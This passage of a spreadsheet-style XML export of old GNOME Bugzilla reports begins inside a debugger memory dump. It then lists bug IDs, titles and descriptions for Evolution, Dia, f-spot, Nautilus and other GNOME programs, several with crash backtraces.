        v_int = 8997772 v_uint = 8997772 v_long = 8997772 
        v_ulong = 8997772 v_int64 = 612873759925816204 
        v_uint64 = 612873759925816204 v_float = 1.26085641e-38 
        v_double = 1.0518369125048363e-267 v_pointer = 0x894b8c}}} {
    g_type = 139810912 data = {{v_int = -1074772840 v_uint =
3220194456 
        v_long = -1074772840 v_ulong = 3220194456 
        v_int64 = 38367654744966296 v_uint64 = 38367654744966296 
        v_float = -1.87709332 v_double = 4.3271975826372234e-306 
        v_pointer = 0xbff04498} {v_int = 142695792 v_uint = 142695792
        v_long = 142695792 v_ulong = 142695792 v_int64 = 343740079472
        v_uint64 = 343740079472 v_float = 7.78587214e-34 
        v_double = 1.6983016436585509e-312 v_pointer = 0x8815d70}}} {
    g_type = 1 data = {{v_int = 8933837 v_uint = 8933837 v_long =
8933837 
        v_ulong = 8933837 v_int64 = 12396306417340877 
        v_uint64 = 12396306417340877 v_float = 1.25189721e-38 
        v_double = 7.7990305552446163e-308 v_pointer = 0x8851cd} {
        v_int = 142695792 v_uint = 142695792 v_long = 142695792 
        v_ulong = 142695792 v_int64 = -4616113167494193808 
        v_uint64 = 13830630906215357808 v_float = 7.78587214e-34 
        v_double = -1.016975434516862 v_pointer = 0x8815d70}}} {
    g_type = 3758104578 data = {{v_int = 142695792 v_uint = 142695792
        v_long = 142695792 v_ulong = 142695792 v_int64 =
594514149258648944 
        v_uint64 = 594514149258648944 v_float = 7.78587214e-34 
        v_double = 6.1096791128812335e-269 v_pointer = 0x8815d70} {
        v_int = 1 v_uint = 1 v_long = 1 v_ulong = 1 
        v_int64 = 12396306408407041 v_uint64 = 12396306408407041 
        v_float = 1.40129846e-45 v_double = 7.7990305464168134e-308 
        v_pointer = 0x1}}} {g_type = 142695888 data = {{v_int =
142695792 
        v_uint = 142695792 v_long = 142695792 v_ulong = 142695792 
        v_int64 = -4616113923408437904 v_uint64 = 13830630150301113712
        v_float = 7.78587214e-34 v_double = -1.0168075878371745 
        v_pointer = 0x8815d70} {v_int = 2684245 v_uint = 2684245 
        v_long = 2684245 v_ulong = 2684245 v_int64 =
612874172236363093 
        v_uint64 = 612874172236363093 v_float = 3.7614284e-39 
        v_double = 1.0519256400601534e-267 v_pointer = 0x28f555}}} {
    g_type = 138421112 data = {{v_int = -1074772776 v_uint =
3220194520 
        v_long = -1074772776 v_ulong = 3220194520 
        v_int64 = 11528541551215832 v_uint64 = 11528541551215832 
        v_float = -1.87710094 v_double = 6.9415649372037899e-308 
        v_pointer = 0xbff044d8} {v_int = 2886240 v_uint = 2886240 
        v_long = 2886240 v_ulong = 2886240 v_int64 =
612874172236565088 
        v_uint64 = 612874172236565088 v_float = 4.04448368e-39 
        v_double = 1.0519256401036219e-267 v_pointer = 0x2c0a60}}} {
    g_type = 3220194552 data = {{v_int = 8933165 v_uint = 8933165 
        v_long = 8933165 v_ulong = 8933165 v_int64 =
612874172242612013 
        v_uint64 = 612874172242612013 v_float = 1.25180304e-38 
        v_double = 1.0519256414048956e-267 v_pointer = 0x884f2d} {
        v_int = 138420240 v_uint = 138420240 v_long = 138420240 
        v_ulong = 138420240 v_int64 = -4616113785973759984 
        v_uint64 = 13830630287735791632 v_float = 5.78155876e-34 
        v_double = -1.0168381044659363 v_pointer = 0x8402010}}} {
    g_type = 8933837 data = {{v_int = 2886240 v_uint = 2886240 
        v_long = 2886240 v_ulong = 2886240 v_int64 =
612873759919704672 
        v_uint64 = 612873759919704672 v_float = 4.04448368e-39 
        v_double = 1.0518369111896594e-267 v_pointer = 0x2c0a60} {
        v_int = -1074772712 v_uint = 3220194584 v_long = -1074772712
        v_ulong = 3220194584 v_int64 = -2305825409512487656 
        v_uint64 = 16140918664197063960 v_float = -1.87710857 
        v_double = -2.692040910658691e+154 v_pointer = 0xbff04518}}}
{
    g_type = 142695888 data = {{v_int = 138418824 v_uint = 138418824
        v_long = 138418824 v_ulong = 138418824 v_int64 = 4433386120 
        v_uint64 = 4433386120 v_float = 5.78090857e-34 
        v_double = 2.1903837766414182e-314 v_pointer = 0x8401a88} {
        v_int = 8933837 v_uint = 8933837 v_long = 8933837 
        v_ulong = 8933837 v_int64 = 594507242817475021 
        v_uint64 = 594507242817475021 v_float = 1.25189721e-38 
        v_double = 6.100390124794349e-269 v_pointer = 0x8851cd}}} {
    g_type = 142695792 data = {{v_int = -1074772680 v_uint =
3220194616 
        v_long = -1074772680 v_ulong = 3220194616 
        v_int64 = 11819929312445752 v_uint64 = 11819929312445752 
        v_float = -1.87711239 v_double = 7.2294943020883806e-308 
        v_pointer = 0xbff04538} {v_int = 138419504 v_uint = 138419504
        v_long = 138419504 v_ulong = 138419504 v_int64 =
594511091237657904 
        v_uint64 = 594511091237657904 v_float = 5.78122081e-34 
        v_double = 6.1055661522637642e-269 v_pointer = 0x8401d30}}} {
    g_type = 1 data = {{v_int = 2886240 v_uint = 2886240 v_long =
2886240 
        v_ulong = 2886240 v_int64 = 594511091102124640 
        v_uint64 = 594511091102124640 v_float = 4.04448368e-39 
        v_double = 6.1055659699749641e-269 v_pointer = 0x2c0a60} {
        v_int = 142695792 v_uint = 142695792 v_long = 142695792 
        v_ulong = 142695792 v_int64 = -4616113304933147280 
        v_uint64 = 13830630768776404336 v_float = 7.78587214e-34 
        v_double = -1.016944916938737 v_pointer = 0x8815d70}}} {
    g_type = 8933165 data = {{v_int = 142695792 v_uint = 142695792 
        v_long = 142695792 v_ulong = 142695792 v_int64 =
594511091241934192 
        v_uint64 = 594511091241934192 v_float = 7.78587214e-34 
        v_double = 6.1055661580152631e-269 v_pointer = 0x8815d70} {
        v_int = -1074772632 v_uint = 3220194664 v_long = -1074772632
        v_ulong = 3220194664 v_int64 = 11226777148999016 
        v_uint64</t>
  </si>
  <si>
    <t>EVOLUTION-256538</t>
  </si>
  <si>
    <t>pressing space with the folder list focused clears the viewed email.</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
pressing space with the folder list focused clears the viewed email.
Steps to reproduce the problem:
1. Open a folder and select an email
2. Switch to a different folder
3. Switch back to the original folder -- the email you'd clicked on should
appear again.
4. Press space.
Actual Results:
Email disappears
Expected Results:
Email should scroll down
How often does this happen? 
Everytime
Additional Information:
Looks like a focus bug.</t>
  </si>
  <si>
    <t>GDM-106172</t>
  </si>
  <si>
    <t>Bosnian entry needed in GDM language table</t>
  </si>
  <si>
    <t>There are now some translations for Bosnian in GNOME (language code bs
locale bs_BA). It should probably have a corresponding language entry in
the gdm greeter.</t>
  </si>
  <si>
    <t>GNOME-TERMINAL-420090</t>
  </si>
  <si>
    <t>Tilde is not a select-by-word character by default</t>
  </si>
  <si>
    <t>This bug was filed in the Debian BTS.
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=304681
When you double-click to select by word ~ is not part of the word by default.  It seems to work better for selecting URLs and pathnames when ~ counts as part of the word.</t>
  </si>
  <si>
    <t>METACITY-103317</t>
  </si>
  <si>
    <t>gnome-terminal window not movable/resizable after going to fullscreen mode</t>
  </si>
  <si>
    <t xml:space="preserve">Bugzilla-Product: metacity
Description:
  Please see https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=74707
  for the original bug report.
   (This is a batch-forwarded bug if it doesn't make sense let me know.
   The bug was forwarded because it's a feature request and we don't
   want to maintain the custom feature or UI change in Red Hat patches
   or because we don't expect to fix it ourselves but thought it might be
   a legitimate issue. It was not obviously a packaging or Red Hat specific bug.
   If you would rather not be forwarded such bugs please advise. Thanks)
------- Bug moved to this database by unknown@bugzilla.gnome.org 2003-01-12 22:47 -------
Reassigning to the default owner of the component hp@redhat.com.
</t>
  </si>
  <si>
    <t>MERGEANT-105984</t>
  </si>
  <si>
    <t>Mergeant crashes on RH8.0 (built from gnome-db SRPMS)</t>
  </si>
  <si>
    <t>Mergeant crashes almost every time I quit the software (does not quit
cleanly and completely) or have access to among others the data source
configuration menu.
If I start mergeant from a terminal I get the following error messages:
(mergeant:12471): GLib-GObject-WARNING **: invalid cast from (NULL) pointer
to `GObject'
(mergeant:12471): GLib-GObject-CRITICAL **: file gobject.c: line 1307
(g_object_unref): assertion `G_IS_OBJECT (object)' failed
If necessary I can try to give more information.
Daniel</t>
  </si>
  <si>
    <t>LIBWNCK-92842</t>
  </si>
  <si>
    <t>Tasklist window menu should popup under mouse</t>
  </si>
  <si>
    <t>When you 2nd click over a window in the task list you get the window menu 
(Minimize Close...). This menu always popups at the begining of window 
tasklist button. If you have big button windows and you click in the 
right side the menu popups very far away in the left. I'll try to ascii-
draw it:
                       -----
                       |   | --&gt; Menu here
_______________________|___|________________
|                    |                 X   |
|      Window1       |     Window 2        |
\------------------------------------------/
X --&gt; Click here
In this case the user needs to nagivate too much screen with the mouse.
The correct behaviour (from an usability a comodity point of view) should 
be to popup up the menu just where the user clicked (just like when you 
2nd click on the panel).</t>
  </si>
  <si>
    <t>DIA-70040</t>
  </si>
  <si>
    <t>Dia v0.88.1 Terminates abnormally and abruptly</t>
  </si>
  <si>
    <t xml:space="preserve">Package: dia
Severity: normal
Version: v0.88.1
Synopsis: Dia v0.88.1 Terminates abnormally and abruptly
Bugzilla-Product: dia
Bugzilla-Component: general
Description:
Dia v0.88.1 Terminates abnormally and abruptly when user selects
Help&gt;Manual.
Action taken: 	Launch Dia v0.88.1
				Click Help
				Click Manual
Result expected:	Launch of Dia Manual
Result Observer:	Program Dia terminates immediately without saving open
file(s).
Note that the installation of Ximian including Dia  is fresh and
unmodified by the user.
Request: How to view Dia Manual without crashing Dia.
Best regards
Larry Tolton
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-01-29 22:29 -------
The original reporter (ljt@portal.ca) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component james@daa.com.au.
</t>
  </si>
  <si>
    <t>ljt</t>
  </si>
  <si>
    <t>F-SPOT-392210</t>
  </si>
  <si>
    <t>Changing display order with photos selected results in incorrect exports</t>
  </si>
  <si>
    <t>Please describe the problem:
If the user changes the display order (View &gt; Reverse Order) while photos are selected and then exports those selected photos f-spot exports the incorrect photos. Specifically photos from the opposite end of the collection are exported. 
Steps to reproduce:
1. Select the first 2 photos (the newest) in the collection
2. Select 'Reverse Order' from the view menu
3. Scroll to the bottom of the window
4. Observe that the selection still appears to contain the two newest photos
5. Select 'Export to Folder' from the File &gt; Export menu
6. Export the files to a folder ('Save the files only' Export method
Actual results:
The two files found in the folder are the last 2 photos (the oldest) in the collection.
Expected results:
The two files found in the folder should be the newest 2 photos (as selected) in the collection.
Does this happen every time?
Yes
Other information:</t>
  </si>
  <si>
    <t>GNOME-APPLETS-313655</t>
  </si>
  <si>
    <t>Bulgarian city Gorna is actually called Gorna Oriahovitsa</t>
  </si>
  <si>
    <t>The Bulgarian location marked Gorna in po-locations should be spelled Gorna
Orjahovitza.
There is no location besides a very tiny village with no airport to be called
Gorna in Bulgaria. The airport is in Gorna Orjahovitza.
Alexander Shopov
Leader of the Bulgarian Gnome translation team.</t>
  </si>
  <si>
    <t>RHYTHMBOX-398093</t>
  </si>
  <si>
    <t>Plugins (other)</t>
  </si>
  <si>
    <t>Album art: decouple art widget from artdb search</t>
  </si>
  <si>
    <t>Currently the art widget (in bottom left) is created in and passed art from the database search in the ArtDisplayPlugin class.
This is bad it should be its own widget and should receive art over the metadatabus like other consumers.  
The ArtDisplayPlugin class should create the widget as an ArtDisplayWidget and just handle calling CoverArtDatabase.get_pixbuf and passing the results out over the metadatabus.
This will allow other sources of album art to have their results shown in the art widget without going via CoverArtDatabase.</t>
  </si>
  <si>
    <t>DIA-121775</t>
  </si>
  <si>
    <t>crashed for no reason</t>
  </si>
  <si>
    <t xml:space="preserve">Package: dia
Severity: normal
Version: 0.88.1
Synopsis: crashed for no reason
Bugzilla-Product: dia
Bugzilla-Component: general
Description:
opened selected flowcharts tried to click the square box and boom.  
Debugging Information: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0x420b4769 in wait4 () from /lib/i686/libc.so.6
#0  0x420b4769 in wait4 () from /lib/i686/libc.so.6
#1  0x4213030c in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x40236ff8 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  
#4  0x403dffa3 in gtk_entry_delete_text () from /usr/lib/libgtk-1.2.so.0
#5  0x403dcb40 in gtk_entry_set_text () from /usr/lib/libgtk-1.2.so.0
#6  0x4044317d in gtk_spin_button_set_value () from /usr/lib/libgtk-1.2.so.0
#7  0x406044bd in box_get_defaults () from /usr/lib/dia/libflowchart_objects.so
#8  0x0806ffa8 in defaults_show ()
#9  0x0806e1aa in tool_select_update ()
#10 0x4040aa9c in gtk_marshal_BOOL__POINTER () from /usr/lib/libgtk-1.2.so.0
#11 0x4043e3e6 in gtk_handlers_run () from /usr/lib/libgtk-1.2.so.0
#12 0x4043d71d in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#13 0x4043b4d5 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#14 0x40475b49 in gtk_widget_event () from /usr/lib/libgtk-1.2.so.0
#15 0x4040a9f5 in gtk_propagate_event () from /usr/lib/libgtk-1.2.so.0
#16 0x40409a1f in gtk_main_do_event () from /usr/lib/libgtk-1.2.so.0
#17 0x404bad6f in gdk_event_dispatch () from /usr/lib/libgdk-1.2.so.0
#18 0x404ec773 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#19 0x404ecd39 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#20 0x404eceec in g_main_run () from /usr/lib/libglib-1.2.so.0
#21 0x404092e3 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#22 0x08087072 in main ()
#23 0x42017499 in __libc_start_main () from /lib/i686/libc.so.6
#0  0x420b4769 in wait4 () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x4213030c in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x40236ff8 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  
No symbol table info available.
#4  0x403dffa3 in gtk_entry_delete_text () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#5  0x403dcb40 in gtk_entry_set_text () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#6  0x4044317d in gtk_spin_button_set_value () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#7  0x406044bd in box_get_defaults () from /usr/lib/dia/libflowchart_objects.so
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2003-09-08 15:32 -------
The original reporter (platypus@proaxis.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component dia-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>platypus</t>
  </si>
  <si>
    <t>GLIB-711178</t>
  </si>
  <si>
    <t>appinfo test problems</t>
  </si>
  <si>
    <t>The gio/tests/appinfo test has 2 problems:
* It opens 4 gnome-terminals and quickly closes them again.
* It prints a critical warning:
[...]
/appinfo/associations: **
GLib-GIO:ERROR:appinfo-test.c:11:main: assertion failed: (envvar != NULL)
[...]</t>
  </si>
  <si>
    <t>NAUTILUS-40207</t>
  </si>
  <si>
    <t>Decide where startup (top) directory goes in file tree</t>
  </si>
  <si>
    <t xml:space="preserve">
------- Additional Comments From ramiro@fateware.com 2000-03-27 11:24:47 ----
Reassign to ramiro.
------- Additional Comments From ramiro@fateware.com 2000-04-07 10:03:47 ----
Resummarizing.
I created a top directory in the nautilus source tree for a place where we can
checkin a sample startup (also known as top) directory for the lower user level.
marking fixed.
------- Additional Comments From sullivan@eazel.com 2000-09-08 15:29:45 ----
Setting all bugs to P6 to start official bug-prioritization plan. Please don't
set the priority to anything other than P6 unless you've got the gold seal of
approval for doing so.
------- Additional Comments From eli@eazel.com 2000-10-16 20:19:03 ----
Batch-assigning QA ownership of remaining bugs to eli@eazel.com
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:39 -------
</t>
  </si>
  <si>
    <t>GNOME-MEDIA-6229</t>
  </si>
  <si>
    <t>(gtcd Crash at 212.147.5.61)</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gtcd
Version: 
Severity: 
&gt;Synopsis: 
&gt;Class: sw-bug
System: intel hardware / Linu RedHat 6.1
&gt;Description:
I'm not as good in english but the error message was:
application gtcd (process ) has crashed due to a fatal error 
(segmentation fault)
I did put a cd in the cd-rom drive and Linux did eject it .
I put it back again and it's now working.
Thanks Bye.	LUCAS
&gt;How-To-Repeat:
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-28 11:32 -------
This bug was previously known as bug 6229 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=6229
Originally filed under the gnome-media product and gtcd component.
The original reporter (lschifferle@vtxnet.ch) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component peter@ximian.com.
</t>
  </si>
  <si>
    <t>lschifferle</t>
  </si>
  <si>
    <t>GNOME-VFS-47192</t>
  </si>
  <si>
    <t>eazel-install: URIs getting munged</t>
  </si>
  <si>
    <t xml:space="preserve">(this is a paraphrase of Robey's description:)
Mouseover on a button on the new softcat (in a product detail page) while not
logged in.  URL
looks like 'eazel-install://anonymous@/product_name=gnucash'.  Clicking on the
button takes you to 'eazel-install:'.
Robey thinks this might be a gnome-vfs bug.
------- Additional Comments From aelman@eazel.com 2001-02-28 19:52:06 ----
NOTE: this is definitely a 1.0 bug as it prevents anonymous use of the new
softcat (although perhaps that's desirable after all?)
------- Additional Comments From mikef@praxis.etla.net 2001-03-01 09:18:03 ----
Actually it might be in nautilus-mozilla-view.
I'm on it.
------- Additional Comments From mikef@praxis.etla.net 2001-03-01 11:10:55 ----
The really mystifying thing here is that the install view seems to be getting
the right URI even if the right URI isn't on the location bar.
------- Additional Comments From mikef@praxis.etla.net 2001-03-01 11:33:03 ----
Robey I'm going to KILL you for using the anonymous@ URI.  That explicitly
breaks shit in the gnome vfs uri canonicalization function.  Oh well I'll make
it work.
------- Additional Comments From mikef@praxis.etla.net 2001-03-01 11:35:13 ----
Not only that but the canonicalization function wants to escape the '=' which
is actually correct behaviour I think since the = isn't part of a query string. 
------- Additional Comments From mikef@praxis.etla.net 2001-03-01 11:36:16 ----
ACtually to be honest what's wrong here is that gnome-vfs is actually trying
to parse an authority field for a URI that it should have nothing to do with.
------- Additional Comments From don@eazel.com 2001-03-01 12:07:24 ----
Approved for 1.0.  Mike does this look like it's fixable?
------- Additional Comments From mikef@praxis.etla.net 2001-03-01 14:31:34 ----
This has been fixed
------- Additional Comments From brett@eazel.com 2001-03-01 15:02:58 ----
Could someone give me the eazel-trilobite-configure.pl command that should be
used to test against the new softcat?
------- Additional Comments From mikef@praxis.etla.net 2001-03-01 15:23:57 ----
Oh I just stuffed the URL in an HTML file on my local apache
------- Additional Comments From robey-bugs@lag.net 2001-03-01 16:03:25 ----
(it's okay for vfs to quote the = -- it's done that for a long time so we
expect it)
------- Additional Comments From robey-bugs@lag.net 2001-03-01 16:08:41 ----
also i want to point out that http://user[:pass]@host[:port]/ is allowed in urls
so :P
:)
------- Additional Comments From brett@eazel.com 2001-03-02 16:43:19 ----
As near as I can tell this bug is fixed.  I can't reproduce a case where
eazel-install: is the resulting url from following a link of another url.  I
created an HTML files that had the link mentioned in this bug report and
Nautilus handled it correctly. Perhaps this should be tested by someone more
familiar with the services environment?  I can't currently access stage-services
for testing there.  
Sherry could you please investigate this?  Thanks!
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 21:03 -------
The original reporter (aelman@eazel.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>mikef</t>
  </si>
  <si>
    <t>aelman</t>
  </si>
  <si>
    <t>GNOME-CORE-13015</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  panel
Severity: normal
Version:  1.2.0
Synopsis: crash
Class:    sw-bug
Distribution: Red Hat Linux release 6.0 (Hedwig)
System: Linux 2.2.14-dIP i686 unknown
C library: glibc-2.1.1-6
C compiler: egcs-2.91.66
glib: 1.2.7
GTK+: 1.2.7
ORBit: ORBit 0.5.1
gnome-libs: gnome-libs 1.2.0
libxml: 1.8.7
gnome-print: gnome-print-0.20-0_helix_1
gnome-core: gnome-core 1.2.0
Description:
right clicked on my clock applet (it's either afterstep clock or another
clock the one with the freeamp theme)
Debugging information:
0x405734f9 in __wait4 ()
#0  0x405734f9 in __wait4 ()
#1  0x405cf1b4 in __DTOR_END__ ()
#2  0x40155111 in gnome_segv_handle (signum=11) at gnome-init.c:655
#3  
#4  0x3ffe8000 in ?? ()
#5  0x4053d505 in __libc_free (mem=0x8328fa8) at malloc.c:2932
#6  0x4009916d in g_free (mem=0x8328fa8) at gmem.c:411
#7  0x402ea087 in gtk_type_free (type=53269 mem=0x8328fa8)
    at gtktypeutils.c:419
#8  0x402a7a2c in gtk_object_finalize (object=0x8328fa8) at gtkobject.c:272
#9  0x402fac94 in gtk_widget_finalize (object=0x8328fa8) at gtkwidget.c:4440
#10 0x402a9884 in gtk_object_unref (object=0x8328fa8) at gtkobject.c:1194
#11 0x402fbbc6 in gtk_widget_unref (widget=0x8328fa8) at gtkwidget.c:4875
#12 0x40296b99 in gtk_propagate_event (widget=0x81dda98 event=0x813c92c)
    at gtkmain.c:1315
#13 0x40295dda in gtk_main_do_event (event=0x813c92c) at gtkmain.c:770
#14 0x4034150b in gdk_event_dispatch (source_data=0x0 
    current_time=0xbffffbec user_data=0x0) at gdkevents.c:2129
#15 0x40097f96 in g_main_dispatch (dispatch_time=0xbffffbec) at gmain.c:656
#16 0x40098561 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#17 0x40098701 in g_main_run (loop=0x8159ef0) at gmain.c:935
#18 0x40295719 in gtk_main () at gtkmain.c:476
#19 0x805591e in main (argc=5 argv=0xbffffcb4) at main.c:275
#20 0x404fccb3 in __libc_start_main (main=0x80555f0  argc=5 
    argv=0xbffffcb4 init=0x8052e24  fini=0x808be6c  
    rtld_fini=0x4000a350  stack_end=0xbffffcac)
    at ../sysdeps/generic/libc-start.c:78
#0  0x405734f9 in __wait4 ()
No locals.
#1  0x405cf1b4 in __DTOR_END__ ()
No symbol table info available.
#2  0x40155111 in gnome_segv_handle (signum=11) at gnome-init.c:655
estatus = 134907960
signum = -512
in_segv = 1
pid = 0
#3  
No symbol table info available.
#4  0x3ffe8000 in ?? ()
No symbol table info available.
#5  0x4053d505 in __libc_free (mem=0x8328fa8) at malloc.c:2932
mem = (void *) 0x78
ar_ptr = (arena *) 0x8328fa0
p = 0x405cd580
#6  0x4009916d in g_free (mem=0x8328fa8) at gmem.c:411
mem = 0x405cd580
#7  0x402ea087 in gtk_type_free (type=53269 mem=0x8328fa8)
    at gtktypeutils.c:419
mem = 0x78
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 13:11 -------
This bug was previously known as bug 13015 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=13015
Originally filed under the gnome-core product and panel component.
Unknown version 1.2.x in product gnome-core. Setting version to the default unspecified.
The original reporter (dap24@linux.ucla.edu) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>dap24</t>
  </si>
  <si>
    <t>GTK+-151555</t>
  </si>
  <si>
    <t>XkbGetState() and XkbStateNotify</t>
  </si>
  <si>
    <t>Currently gtk+ selects for XKBStateNotify in *all* circumstances. This event is
emitted every time a modifier or a mouse button is pressed. GTK+'s response to
this event is to call XkbGetState() to see what changed.
- This is not needed. The necessary information is already available in the
  XkbStateNotify event
- The call XkbSelectEventDetail() can be used to specify when exactly the
  X server should emit the XkbStateNotify event. Calling XkbSelectEventDetail()
  with the right mask would allow GTK+ to only get the event when something
  interesting actually happens.</t>
  </si>
  <si>
    <t>GNOME-VFS-339442</t>
  </si>
  <si>
    <t>matlab files misclassified as objective-c source files</t>
  </si>
  <si>
    <t>as title says.</t>
  </si>
  <si>
    <t>GNOME-MIME-DATA-130178</t>
  </si>
  <si>
    <t>Default</t>
  </si>
  <si>
    <t>GNOME-MIME-DATA</t>
  </si>
  <si>
    <t>Matroska video file inconsistency in gnome-mime-data</t>
  </si>
  <si>
    <t>#: gnome-vfs.keys.in.h:178
msgid Matroska video file
Every other video format in gnome-mime-data just says ${FORMAT} video so
it seems strange that this should be video file. I suggest using just
Matroska video for consistency.</t>
  </si>
  <si>
    <t>gnome-mime-data-maint</t>
  </si>
  <si>
    <t>EVOLUTION-202125</t>
  </si>
  <si>
    <t>Help &gt; Submit Bug Report should lead to bugzilla</t>
  </si>
  <si>
    <t>Assuming that you are using Bugzilla for all bugs Help &gt; Submit Bug report
should open a browser window to bugzila.ximian.com instead of calling
bug-buddy.... maybe</t>
  </si>
  <si>
    <t>EVOLUTION_EXCHANGE-273881</t>
  </si>
  <si>
    <t>Recurrence: Make this occurence movable creates one more occurence</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
Steps to reproduce the problem:
1. Select an recurrence meeting right click and 'Make this as Movable'
2. Creates one more occurence of the same meeting on same time &amp; duration
3. 
Actual Results:
Expected Results:
How often does this happen? 
Always
Additional Information:</t>
  </si>
  <si>
    <t>EVOLUTION-203856</t>
  </si>
  <si>
    <t>Wacky focus in Rename shortcut</t>
  </si>
  <si>
    <t>I am not sure what is wrong (as the code is doing the Right Thing AFAIK)
but the dialog for renaming a shortcut handles the focus in a weird way. 
The entry gets keyboard input but it doesn't have a focus rectangle and
the cursor is missing.</t>
  </si>
  <si>
    <t>GEDIT-64334</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gedit
Severity: normal
Version: 0.6.1
&gt;Synopsis: 
&gt;Class: sw-bug
Distribution: Red Hat Linux release 6.2 (Zoot)
System: Linux 2.2.14-5.0smp i686 unknown
C library: glibc-2.1.3-22
C compiler: egcs-2.91.66
glib: 1.2.6
GTK+: 1.2.6
ORBit: ORBit 0.5.0
gnome-libs: gnome-libs 1.0.55
gnome-core: gnome-core-1.0.55-12j2
Debugging information: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0x4048a8c9 in __wait4 () from /lib/libc.so.6
#0  0x4048a8c9 in __wait4 () from /lib/libc.so.6
#1  0x404e91cc in ?? () from /lib/libc.so.6
#2  0x40091211 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  0x40417c48 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
#4  0x401e6efd in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#5  0x40213a7b in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#6  0x40211b95 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#7  0x401f77e3 in gtk_object_shutdown () from /usr/lib/libgtk-1.2.so.0
#8  0x401f778b in gtk_object_destroy () from /usr/lib/libgtk-1.2.so.0
#9  0x8053908 in gE_document_new_with_file ()
#10 0x804f731 in main ()
#11 0x404119cb in __libc_start_main (main=0x804f380  argc=2 
    argv=0xbffffac4 init=0x804dfa0  fini=0x805c74c  
    rtld_fini=0x4000aea0  stack_end=0xbffffabc)
    at ../sysdeps/generic/libc-start.c:92
#0  0x4048a8c9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x404e91cc in ?? () from /lib/libc.so.6
No symbol table info available.
#2  0x40091211 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  0x40417c48 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
No locals.
#4  0x401e6efd in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#5  0x40213a7b in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#6  0x40211b95 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#7  0x401f77e3 in gtk_object_shutdown () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-11-11 23:30 -------
The original reporter (masami@ap.il24.net) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component chema@celorio.com.
</t>
  </si>
  <si>
    <t>masami</t>
  </si>
  <si>
    <t>EVOLUTION-243862</t>
  </si>
  <si>
    <t>first run imap account won't load folders until account is disabled and re-enabled</t>
  </si>
  <si>
    <t>So if you start from complete scratch and create a new IMAP SSL account
evo just sits there trying to poke the inbox. Restart it and you
immediately get prompted to accept the certificate (which you aren't the
first time) and life proceeds as you expect it.</t>
  </si>
  <si>
    <t>GDL-342227</t>
  </si>
  <si>
    <t>gdl build fixes for mingw</t>
  </si>
  <si>
    <t>Build fixes for mingw.</t>
  </si>
  <si>
    <t>F-SPOT-335935</t>
  </si>
  <si>
    <t>Export to folder bugs when pictures bear same name</t>
  </si>
  <si>
    <t>Please describe the problem:
The export to folder feature uses file names based on the image name. If one is
to export pictures with same file name (but of course different paths) the last
one to be exported clobbers the others. The filename is desirable as it is
sometimes based on the topic of the image and is memory-friendly for url
(look this is at http://something/photos/funny_face.jpg) but this prevents
having pictures with the same base name to be exported together (and all of my
panoramic pictures built with Hugin use panoramic1.jpg panoramic2.jpg...
beginning at 1 for each photo session).
Steps to reproduce:
1. Open f-spot select pictures that have the same name on disk
2. Export them to Folder
3. Open index.html
Actual results:
Index shows only one picture in multiple copies.
Expected results:
Index shows many pictures in one copy each.
Does this happen every time?
Yes
Other information:
Patch included. Rationale for using (DbItem).Id as complement to the image is as
follows: when using more complex export destinations image name should probably
be a constant therefore not something based on the order in which the photos
were selected or with which photos they were selected. Something dependent on
